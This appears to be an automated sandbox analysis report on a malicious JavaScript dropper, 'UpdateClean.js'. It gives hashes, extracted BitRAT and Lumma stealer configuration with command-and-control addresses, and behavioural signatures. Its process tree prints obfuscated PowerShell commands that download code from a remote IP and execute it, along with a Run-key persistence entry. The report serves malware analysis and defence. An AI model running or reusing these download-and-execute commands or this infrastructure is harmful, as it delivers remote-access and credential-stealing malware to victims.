Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
25-04-2024 21:57
Static task
static1
Behavioral task
behavioral1
Sample
UpdateClean.js
Resource
win7-20240221-en
General
-
Target
UpdateClean.js
-
Size
5KB
-
MD5
d6942e22893e95deea7bbe9d9f9e2a94
-
SHA1
4d002c2b134d52d0ce8a6715e1ab75b4dd36d4d9
-
SHA256
b3bdd33dcaf6d7453e5aca839f814ba5754b7b4f5b119890c8f4a16bf149c9ad
-
SHA512
b1969093839283c68928bd38f8ee0788d85ce71272e18e59316897b223b6d94178464360d7d0e204bd78ea315bfc452607f22a4fbc30686c8439f125124d3b80
-
SSDEEP
96:rBup4W/ul47KmtSzemZYSBTJABlaxVRo/JR3Ui7RDqG1+qnA++B+k+++8H+e7it5:rBu6W/N+qS1ZjJAixVRo/JR3N7RLr+ru
Malware Config
Extracted
http://77.221.151.31/a/z.png
Extracted
http://77.221.151.31/a/s.png
Extracted
bitrat
1.38
77.221.151.31:4444
-
communication_password
7b13ff385b95cf25d53088d6b7c5d890
-
tor_process
tor
Extracted
lumma
https://strollheavengwu.shop/api
https://productivelookewr.shop/api
https://tolerateilusidjukl.shop/api
https://shatterbreathepsw.shop/api
https://shortsvelventysjo.shop/api
https://incredibleextedwj.shop/api
https://alcojoldwograpciw.shop/api
https://liabilitynighstjsko.shop/api
https://demonstationfukewko.shop/api
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 4 1448 powershell.exe 5 408 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation wscript.exe -
Processes:
resource yara_rule behavioral2/memory/2216-40-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-45-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-46-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-41-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-48-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-49-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-51-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-52-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-54-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-53-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-55-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-56-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-57-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-59-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-60-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-61-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-62-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-64-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-65-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-66-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-67-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-68-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-69-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-70-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-71-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-73-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-74-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-75-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-76-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-77-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-78-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-79-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-81-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-85-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-89-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-93-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-97-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-101-0x0000000000400000-0x00000000007D3000-memory.dmp upx behavioral2/memory/2216-105-0x0000000000400000-0x00000000007D3000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "wscript //E:VBScript C:\\Users\\Public\\0x.log //Nologo" powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
RegSvcs.exepid process 2216 RegSvcs.exe 2216 RegSvcs.exe 2216 RegSvcs.exe 2216 RegSvcs.exe 2216 RegSvcs.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process target process PID 408 set thread context of 2828 408 powershell.exe RegSvcs.exe PID 1448 set thread context of 2216 1448 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 408 powershell.exe 1448 powershell.exe 408 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeShutdownPrivilege 2216 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
RegSvcs.exepid process 2216 RegSvcs.exe 2216 RegSvcs.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
wscript.exepowershell.exepowershell.execmd.exedescription pid process target process PID 4416 wrote to memory of 1448 4416 wscript.exe powershell.exe PID 4416 wrote to memory of 1448 4416 wscript.exe powershell.exe PID 4416 wrote to memory of 408 4416 wscript.exe powershell.exe PID 4416 wrote to memory of 408 4416 wscript.exe powershell.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 408 wrote to memory of 2828 408 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 3888 1448 powershell.exe cmd.exe PID 1448 wrote to memory of 3888 1448 powershell.exe cmd.exe PID 3888 wrote to memory of 2176 3888 cmd.exe attrib.exe PID 3888 wrote to memory of 2176 3888 cmd.exe attrib.exe PID 1448 wrote to memory of 4416 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 4416 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 4416 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 1604 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 1604 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 1604 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 2216 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 2216 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 2216 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 2216 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 2216 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 2216 1448 powershell.exe RegSvcs.exe PID 1448 wrote to memory of 2216 1448 powershell.exe RegSvcs.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\UpdateClean.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log3⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\attrib.exeattrib +h C:\Users\Public\0x.log4⤵
- Views/modifies file attributes
PID:2176
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:4416
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:1604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2216
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:2828
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3756 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:4064
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD59370680d9e75f9273830871b94aff80d
SHA10af89e92ff564c0bde6e1efa6e4e2d91e6d90fa3
SHA2564300d4dc2ece67f8a9e2c6a70c1b8eedb977c1bdf7a8a5be4e7f7e5afb55d27c
SHA512b4b497f9b7b27b018e94fb6ec6ff6143fcb26a298e82d4146b05402354b2345118955fa0f9160aa56102d413a22a58a102d11748491727e1830e06a686e04af1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
62KB
MD5d2e9de8671fd61605ff5f8b8f3249d6b
SHA138dc0accb9c561c4f2ed9cc565f73a09eb84e81c
SHA256fcdaa801a02c05faa8e09a1abb75ab4b8b4a57e1d097cc5feb63b95280230e5c
SHA512413abbf5eb1a19fec41bbf31cfa524a8c88f049ae624c2b8f8cd40b3dc6ca37b99a45e74cfcb3422bee104e218ebc6b3d38f22b5b9afbd967545aa862b15a106